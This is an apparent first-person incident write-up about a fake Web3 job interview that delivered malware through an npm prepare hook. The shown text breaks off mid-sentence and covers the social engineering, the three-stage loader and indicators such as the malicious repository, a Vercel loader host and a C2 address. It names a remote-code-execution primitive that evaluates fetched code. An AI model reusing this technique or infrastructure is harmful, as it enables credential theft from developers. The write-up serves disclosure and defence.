Last updated: 2026-04-19 Status: C2 active / repository still up / reports pending TL;DR — I was targeted by a supply chain attack during what looked like a legitimate Web3 job interview. npm install on the repository they asked me to clone silently spawned a background Node process that exfiltrated my entire environment and opened a persistent TCP backdoor on an attacker-controlled server in Texas. This post reverse-engineers the full attack chain: the social engineering layer, the three-stage loader, the new Function("require", response.data) RCE primitive, the two separate C2 endpoints (Vercel loader → custom TCP beacon on port 1224), and the full polling protocol — reproduced and captured in an isolated Hetzner VM with tcpdump, Docker, and tshark stream analysis. Includes IoCs, defensive guide, and the complete repository snapshot preserved for researchers. Repository analyzed: github.com/0G-Labs-IO/MGVerse — impersonating the legitimate 0G Labs . Snapshot archived in case it's taken down. Key facts Entry vector: npm prepare hook RCE primitive: new Function("require", response.data) Stage 1: Vercel loader ( ipcheck-six.vercel.app ) Stage 2: TCP C2 ( 216.250.249.176:1224 ) Exfiltration: full process.env Campaign tag: tid=Y3Jhc2ggdGhlIGJhZCBndXlz Contents Context The social engineering layer High-level attack chain Stage 1 — The prepare lifecycle hook Stage 2 — Background execution Stage 3 — The RCE primitive Decoding the first-stage endpoint The sandbox setup — reproducing the attack safely Reverse-engineering the C2 protocol Infrastructure analysis What the attacker sees, what they can do Git forensics — attributing the malicious commits Indicators of Compromise (IoCs) Defensive guide Incident response playbook Related campaigns and prior art Reporting Future work Appendix: the malicious code in full 1. Context Supply chain attacks on developers have moved past the classic "typosquat on npm" pattern. The newer, more targeted variant works through social engineering: A recruiter on LinkedIn or Telegram contacts a developer with a plausible Web3 job offer After a friendly intro call, a "hiring manager" asks the candidate to clone and run a take-home repo — live, on a screen share The repo looks legitimate: mainstream dependencies, plausible README, working frontend During npm install , a hidden payload executes Credentials, SSH keys, browser cookies, crypto wallet data, and .env files become accessible to the attacker The social pressure of a live interview is the critical vector. You don't have time to audit the repo. You're sharing your screen. You want to impress so you run npm install . I got targeted by exactly this. During the session I felt something was off — the interviewer kept pushing me to run the code while asking about my projects and websites. I ran npm install in a working directory that didn't contain sensitive secrets (no SSH agent loaded, no wallet seeds on disk in that context), caught the background process ~44 minutes later in ps aux , killed it, and went into full incident response mode. That was the first hour. What follows is the second hour onward: I set up an isolated Hetzner VM specifically to reproduce the attack safely, captured every packet, and reverse-engineered the complete C2 protocol. This is the full forensic write-up. 2. The social engineering layer The technical payload is almost trivial compared to the elaborate social engineering. The attackers operate across multiple coordinated touchpoints: LinkedIn profile impersonating a recruiter — real-looking activity, connections, a plausible company behind them Calendly link pointing to a "hiring manager" Google Calendar that's not obviously fake Google Meet interview with someone pretending to be a CTO or technical lead — in my case with a distinct Chinese accent A GitHub org whose name is visually similar to a legitimate company ( 0G-Labs-IO vs real 0glabs / 0gfoundation ) A cover story — they're "building on top of" a well-known funded protocol, claim traction, show a working demo The pitch documentation was equally polished. The recruiter shared a Google Doc titled "0G Labs - Hire" ( docs.google.com/document/d/1SM0wVMyi-... ) containing a fake company overview, descriptions of two projects ("MGVerse" and "ZeroScope"), a detailed organizational values section, and a full salary table listing 15 roles from "Fractional CTO" ($250K–$280K) to "DevOps Engineer" ($130K–$170K). The document used the real 0G Labs branding and accurately described their actual product (deAIOS, modular blockchain, DA layer) — all sourced from the real company's public materials. The Calendly booking link was calendly.com/0glabs/interview , using the real company's name as the Calendly slug. In my case, the real 0G Labs is a legitimate San Francisco company with hundreds of millions in raised funding building decentralized AI infrastructure. The attackers set up github.com/0G-Labs-IO (note the -IO suffix that makes it look like a subsidiary or too...